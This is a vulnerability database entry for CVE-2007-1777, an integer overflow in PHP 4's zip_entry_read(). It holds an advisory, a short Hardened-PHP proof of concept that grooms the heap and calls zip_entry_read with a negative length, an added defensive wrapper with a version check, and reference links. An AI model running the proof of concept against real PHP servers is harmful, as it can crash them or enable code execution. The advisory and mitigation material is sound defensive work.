PHP zip_entry_read() Integer Overflow Vulnerability

Vulnerability ID 1112591 Vulnerability type Boundary condition error
Published 2007-03-27 Updated 2008-07-26
CVE ID CVE-2007-1777 CNNVD-ID CNNVD-200703-683
Platform PHP CVSS score 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/29788
https://www.securityfocus.com/bid/23169
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-683
|Vulnerability details
An integer overflow vulnerability exists in the zip_entry_read function of PHP 4 versions before 4.4.5. A remote attacker can execute arbitrary code via a ZIP archive containing an entry.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/23169/info

PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a heap-based buffer overflow.

Exploiting this issue may allow attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.

This issue affects versions prior to PHP 4.4.5.

<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //        PHP 4 zip_entry_read() Integer Overflow Vulnerability       //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  // Open an archive and its first entry (any x.zip with at least one entry).
  $r = zip_open("x.zip");
  $e = zip_read($r);
  $x = zip_entry_open($r, $e);

  // Heap layout preparation: allocate many small arrays, then free one of them.
  for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));
  unset($arr[600]);

  // Trigger: a negative length is passed to zip_entry_read().
  zip_entry_read($e, -1);

  unset($arr[601]);
?>
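The defensive counterpart to the PoC above is a caller-side guard that never lets an unchecked length reach the extension and refuses to run on the affected interpreter range. The block below is an added example, not code from the advisory or from the Hardened-PHP Project; it assumes only the standard ext/zip procedural API (zip_open, zip_read, zip_entry_open, zip_entry_filesize, zip_entry_read, zip_entry_close), the version boundary the advisory states (PHP 4 before 4.4.5), and a constructed 1 MiB per-call cap and archive name.

```php
<?php
// Added example: caller-side hardening around zip_entry_read().
// Written without exceptions or type hints so it also parses on PHP 4.

define('MAX_ENTRY_READ', 1048576); // constructed cap: 1 MiB per read call

// True when the running interpreter falls in the range named by the advisory
// (PHP 4 before 4.4.5). Takes the version string as a parameter for testing.
function php_build_is_affected($version = PHP_VERSION) {
    return version_compare($version, '4.0.0', '>=')
        && version_compare($version, '4.4.5', '<');
}

// Reduce a requested length to a safe value, or return false when the request
// is not a positive integer. The size declared in the entry header is untrusted
// as well (it comes from the archive), so the constant cap is applied last.
function bounded_read_length($entry, $requested) {
    if (!is_int($requested) || $requested <= 0) {
        trigger_error('zip read length must be a positive integer', E_USER_WARNING);
        return false;
    }
    $declared = zip_entry_filesize($entry);
    if ($declared === false || !is_int($declared) || $declared < 0) {
        trigger_error('zip entry has no usable declared size', E_USER_WARNING);
        return false;
    }
    return min($requested, $declared, MAX_ENTRY_READ);
}

// Wrapper: refuse on an affected build, validate the length, then read.
// Returns the data string, '' for an empty entry, or false on rejection.
function safe_zip_entry_read($entry, $requested = 1024) {
    if (php_build_is_affected()) {
        trigger_error('PHP ' . PHP_VERSION . ' is affected by CVE-2007-1777; upgrade to 4.4.5 or later',
                      E_USER_ERROR);
        return false;
    }
    $len = bounded_read_length($entry, $requested);
    if ($len === false) {
        return false;
    }
    if ($len === 0) {
        return '';          // nothing to read; avoid a zero-length call entirely
    }
    return zip_entry_read($entry, $len);
}

// Usage: iterate an archive, reading each entry through the guarded wrapper.
$zip = zip_open('archive.zip'); // constructed file name
if (is_resource($zip)) {
    while (($entry = zip_read($zip)) !== false) {
        if (zip_entry_open($zip, $entry, 'r')) {
            // The PoC's -1 is rejected here with a warning instead of reaching ext/zip.
            $data = safe_zip_entry_read($entry, -1);
            if ($data !== false) {
                // process $data ...
            }
            zip_entry_close($entry);
        }
    }
    zip_close($zip);
}
```

The declared entry size is capped by a constant rather than trusted on its own because a crafted archive controls that header field too; the version check is the detection half, the bounded length is the mitigation half, and the only durable fix remains upgrading to PHP 4.4.5 or later.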
|Affected products
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Server 11 x64
Turbolinux Turbolinux Server 11
Turbolinux Turbolinux Server 10.0.0 x64
TurboLinux Personal
TurboLi
|References

Source: BID
Name: 23169
Link: http://www.securityfocus.com/bid/23169
Source: MISC
Link: http://www.php-security.org/MOPB/MOPB-35-2007.html
Source: MANDRIVA
Name: MDVSA-2008:130
Link: http://www.mandriva.com/security/advisories?name=MDVSA-2008:130
Source: DEBIAN
Name: DSA-1283
Link: http://www.debian.org/security/2007/dsa-1283
Source: DEBIAN
Name: DSA-1282
Link: http://www.debian.org/security/2007/dsa-1282
Source: SECUNIA
Name: 25062
Link: http://secunia.com/advisories/25062
Source: SECUNIA
Name: 25025
Link: http://secunia.com/advisories/25025